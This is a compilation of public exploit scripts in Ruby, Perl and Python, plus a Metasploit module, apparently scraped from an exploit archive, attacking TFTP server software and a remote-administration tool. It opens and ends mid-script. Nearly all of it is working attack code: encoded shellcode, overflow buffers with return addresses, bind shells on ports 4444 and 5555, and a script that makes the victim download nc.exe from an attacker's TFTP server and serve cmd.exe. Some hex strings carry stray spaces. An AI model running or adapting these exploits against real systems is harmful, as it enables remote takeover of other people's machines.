sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x 64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x 57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\x e7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x 7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x 8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\x a8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\x fc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x 53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\x fd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\x f2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"
jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english
host = ARGV[0]
port = 69
if ARGV[1]
port = ARGV[1]
end
sock = UDPSocket.new()
puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
raise "Unable to connect to #{host}"
end
exploit = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129
exploit += sc1
exploit += jmp
exploit += "\x00"
puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0
puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"
# [2006-11-30]
69 AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
#acaro[at]jervus.it
#http://www.securityfocus.com/bid/21320
#
# [email protected] is credited with the discovery of this vulnerability
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: atftp-19.pl <victim> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xf1".
"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\x f1\xf1\xd2\x43".
"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\x d1\xf0\xb2\x4f".
"\x7a\xc5\xd2\x07\x1f\xc0\x99\x9f\x5d\x75\x99\x72\x f6\x30\x93\x0b".
"\xf0\x33\xb2\xf2\xca\xa5\x7d\x02\x84\x14\xd2\x59\x d5\xf0\xb2\x60".
"\x7a\xfd\x12\x8d\xae\xed\x58\xed\x7a\xed\xd2\x07\x 1a\x78\x05\x22".
"\xf5\x32\x68\xc6\x95\x7a\x19\x36\x74\x31\x21\x0a\x 7a\xb1\x55\x8d".
"\x81\xed\xf4\x8d\x99\xf9\xb2\x0f\x7a\x71\xe9\x06\x f1\xf1\xd2\x6e".
"\xcd\xae\x68\xf0\x91\xa7\xd0\xfe\x72\x31\x22\x56\x 99\x01\xd3\x02".
"\xae\x99\xc1\xf8\x7b\xff\x0e\xf9\x16\x92\x38\x6a\x 92\xdf\x3c\x7e".
"\x94\xf1\x59\x06";
#$eip="\x42\x42\x42\x42";
$eip="\xf4\xf5\xe3\x75"; #call [ESP+28] in IMM32.dll on win2k Server SP4 Italian
$mode = "netascii";
$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0" . $mode . "\0";
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
exit;
# [2006-12-03]
69 TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
$shellcode =
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x 0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x 32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\x F4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x 03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x 3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x 8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x 3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x 30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x 11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x 24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x 50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
$exploit = "\x00\x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
# [2007-01-15]
69 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta)
package Msf::Exploit::3com_tftp_long_mode;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
my $advanced =
{
};
my $info =
{
'Name' => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
'Version' => '$ 1.0 $',
'Authors' => ['Enseirb <vincenty [at] enseirb.fr>', ],
'Description' =>
Pex::Text::Freeform(qq{
This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The TFTP target adress', "127.0.0.1" ],
'RPORT' => [ 0, 'PORT', 'The TFTP target port', 69 ],
},
'Payload' =>
{
'Space' => 344,
'BadChars' => "\x00",
},
'Refs' =>
[
['URL', 'http://www.securityfocus.com/bid/21301'],
['CVE', '2006-6183'],
['URL', 'http://secunia.com/advisories/23113'],
['URL', 'http://www.securityfocus.com/archive/1/452754'],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ '0 - Windows XP SP2 ENG', 0x77d4e23b ], #or 0x77bc2063
[ '1 - Windows XP SP1 FR', 0x77d8117b ],
[ '2 - Windows XP SP2 FR', 0x77d8d9af ],
],
'Keys' => [ '3com' ],
'DisclosureDate' => 'Nov 27 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_idx = $self->GetVar('TARGET');
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $buff = "\x00\x02"; # for a WRQ (WriteReQuest) (or "\x00\x01" for a RRQ)
$buff .= "filename_string";
$buff .= "\x00";
$buff .= $self->MakeNops(129) . $shellcode;
$buff .= pack('V',$target->[1]);
$buff .= "\x00";
$self->PrintLine('[+] Try to connect... ' . $target_host . ':' . $target_port);
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[-] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine('[+] Connected!');
$self->PrintLine('[+] Sending exploit...');
$s->Send($buff);
$self->PrintLine('[+] Exploit sent!');
$s->Close();
return;
}
1;
# [2007-01-21]
69 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)
#!/usr/bin/perl -w
# ================================================== =============================================
# 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ================================================== ============================================
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
#
# Reference : http://www.securityfocus.com/bid/21301
#
# Date : 27-02-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in transporting mode name of TFTP server.
#
# So here you go.
#
# Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00";
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
# #
#================================================= ==============================================
use IO::Socket;
if(!($ARGV[1]))
{
print "\n3COM Tftp long transport name exploit\n";
print "\tCoded by Umesh wanve\n\n";
print "Use: 3com_tftp.pl <host> <port>\n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\x a0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x 30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\x a6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x 73\x9c\x97\x7c".
"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x 17\xd4\xb2\xbf".
"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\x c3\x8b\x83\xdf".
"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x 06\xc6\x5f\x04".
"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x 17\x9c\x4c\x84".
"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\x c9\x25\xbb\x56".
"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x 9e\x9b\xe0\x07".
"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x 2e\x9b\x3a\xb5".
"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x 1d\x37\x63\x3c".
"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\x ad\x81\x35\x1d".
"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x 31\x0e\xca\x03".
"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\x c1\x2d\xd9\x04".
"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\x e2\x36\xf1\x79".
"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\x b6\x7b\xa5\xab".
"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x 19\x99\xe6\x05".
"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\x b7\xff\x4c\x84".
"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\x b8\x42\xb7\x0b".
"\x1b\x37\x65\xab\x98\xc8\xb3\x54";
print "++ Building Malicous Packet .....\n";
$nop="\x90" x 129;
$jmp_2000 = "\x0e\x08\xe5\x77"; # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
$exploit = "\x00\x02"; #write request (header)
$exploit=$exploit."A"; #file name
$exploit=$exploit."\x00"; #Start of transporting name
$exploit=$exploit.$nop; #nop sled to land into shellcode
$exploit=$exploit.$shellcode; #our Hell code
$exploit=$exploit.$jmp_2000; #jump to shellcode
$exploit=$exploit."\x00"; #end of TS mode name
print $target $exploit; #Attack on victim
print "++ Exploit packet sent ...\n";
print "++ Done.\n";
print "++ Telnet to 4444 on victim's machine ....\n";
sleep(2);
close($target);
exit;
#------------------------------------------------------------------------------------------------------------
# [2007-02-28]
69 FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
#!/usr/bin/perl
# ================================================== =============================================
# FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# By Umesh Wanve
# ================================================== =============================================
#
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
# This exploit will open port 5555 on remote server. Connect it to open shell.
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#================================================= =================================================
use IO::Socket;
#use strict;
my($read_request)="\x00\x01"; # GET or PUT request
my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"; #transporting mode (eg. netascii)
# win32_bind - EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com
my($shellcode)=
"\x90\x90\x90\x90". #padding
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x60".
"\x5f\x45\x77\x83\xee\xfc\xe2\xf4\x9c\x35\xae\x3a\x 88\xa6\xba\x88".
"\x9f\x3f\xce\x1b\x44\x7b\xce\x32\x5c\xd4\x39\x72\x 18\x5e\xaa\xfc".
"\x2f\x47\xce\x28\x40\x5e\xae\x3e\xeb\x6b\xce\x76\x 8e\x6e\x85\xee".
"\xcc\xdb\x85\x03\x67\x9e\x8f\x7a\x61\x9d\xae\x83\x 5b\x0b\x61\x5f".
"\x15\xba\xce\x28\x44\x5e\xae\x11\xeb\x53\x0e\xfc\x 3f\x43\x44\x9c".
"\x63\x73\xce\xfe\x0c\x7b\x59\x16\xa3\x6e\x9e\x13\x eb\x1c\x75\xfc".
"\x20\x53\xce\x07\x7c\xf2\xce\x37\x68\x01\x2d\xf9\x 2e\x51\xa9\x27".
"\x9f\x89\x23\x24\x06\x37\x76\x45\x08\x28\x36\x45\x 3f\x0b\xba\xa7".
"\x08\x94\xa8\x8b\x5b\x0f\xba\xa1\x3f\xd6\xa0\x11\x e1\xb2\x4d\x75".
"\x35\x35\x47\x88\xb0\x37\x9c\x7e\x95\xf2\x12\x88\x b6\x0c\x16\x24".
"\x33\x0c\x06\x24\x23\x0c\xba\xa7\x06\x37\x50\xc4\x 06\x0c\xcc\x96".
"\xf5\x37\xe1\x6d\x10\x98\x12\x88\xb6\x35\x55\x26\x 35\xa0\x95\x1f".
"\xc4\xf2\x6b\x9e\x37\xa0\x93\x24\x35\xa0\x95\x1f\x 85\x16\xc3\x3e".
"\x37\xa0\x93\x27\x34\x0b\x10\x88\xb0\xcc\x2d\x90\x 19\x99\x3c\x20".
"\x9f\x89\x10\x88\xb0\x39\x2f\x13\x06\x37\x26\x1a\x e9\xba\x2f\x27".
"\x39\x76\x89\xfe\x87\x35\x01\xfe\x82\x6e\x85\x84\x ca\xa1\x07\x5a".
"\x9e\x1d\x69\xe4\xed\x25\x7d\xdc\xcb\xf4\x2d\x05\x 9e\xec\x53\x88".
"\x15\x1b\xba\xa1\x3b\x08\x17\x26\x31\x0e\x2f\x76\x 31\x0e\x10\x26".
"\x9f\x8f\x2d\xda\xb9\x5a\x8b\x24\x9f\x89\x2f\x88\x 9f\x68\xba\xa7".
"\xeb\x08\xb9\xf4\xa4\x3b\xba\xa1\x32\xa0\x95\x1f\x 90\xd5\x41\x28".
"\x33\xa0\x93\x88\xb0\x5f\x45\x77".
"\x90\x90\x90\x90". #padding
"\x90\x90\x90\x90";
my($pointer_to_next_seh)="\xeb\x06\x90\x90"; #short jump to shellcode
my($seh_handler)="\xa9\x11\x02\x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
#Building malicious buffer
my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode. $tailer;
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto => "UDP"))
{
print "++Building Packet......\n" ;
print "++Connecting to server.....\n";
print "++Sending Buffer ....\n";
print "++Exploit Successfull...\n";
print "++Connect to victim on 5555.....\n";
# request + file name + mode
#see tftp protocol
print $socket $buffer;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69\n";
}
# __END_CODE
# [2007-03-22]
69 Rational Software Hidden Administrator 1.7 Auth Bypass Exploit
################################################## ##################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# http://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################################## ##################################
import socket
import struct
import time
import sys
import getopt
def usage():
print "\n"
print "################################################## ####"
print "# Hidden Administrator Authentication Bypass Exploit #"
print "# Coded By ahmed[at]rewterz.com #"
print "################################################## ####"
print "\n"
print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
print "make sure nc.exe exists on tftpd server\n"
def exploit():
h ="%X" % (130+len(tftpd))
buff1='_file_manager_operations_copy_files_Loc_Rem _c:\\^file\r\n\x0brewt_ha.bat'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1 += ('\\x' + h).decode('string_escape')
buff1 += '\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00tftp -i ' + tftpd + ' GET nc.exe c:\\nc.exe '
buff1+='\r\nc:\\nc.exe -L -d -p 4444 -e cmd.exe \r\n\r\n '
buff1+=' \r\n\r\n_file_manager_operations_get_cur_dir_c:\r\ n'
try:
print "[+] Connecting to %s" %host
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,int(port)))
print "[+] Uploading Files"
s.send(buff1)
time.sleep(2)
s.send('+run_C:\\rewt_ha.bat|\r\n')
time.sleep(1)
print "[+] DONE [+]"
print "[+] Now Connect to port 4444 on victim IP !!!"
except:
print "[+] Could not connect to the server"
if len(sys.argv)<7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-t':
tftpd=value
exploit()
# [2007-05-19]
69 TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
################################################## ################
# bt ~ # sourceforge-tftpd.py
# TFTP Server for Windows V1.4 ST (0day)
# http://www.offensive-security.com
# Sending evil packet, ph33r
# Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
################################################## ################
import socket
import sys
print " TFTP Server for Windows V1.4 ST (0day)"
print " http://www.offensive-security.com"
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
# Jump back shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\x c5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x 5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\x e5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x 03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x 8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\x ec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x 54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x 81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\x ff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x 11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x 6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x 55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\x ff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x 6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x 6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\x d6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x 68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x 57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x 53\xff\xd6"
"\xff\xd0")
filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"
mode = "netascii"
muha = "\x00\x02" + filename+ "\0" + mode+ "\0"
print " Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print " Check port 4444 for bindshell"
# [2008-03-26]
69 Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
################################################## #######
# bt ~ # quickftp.py
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# http://www.offensive-security.com
# Sending evil packet, ph33r
# Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
################################################## ########
import socket
import sys
print " Quick TFTP Pro 2.1 SEH Overflow (0day)"
print " http://www.offensive-security.com"
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "pwnd"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x 5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\x e5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x 03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x 8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\x ec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x 54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x 81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\x ff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x 11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x 6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x 55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\x ff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x 6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x 6a\x44\x89"
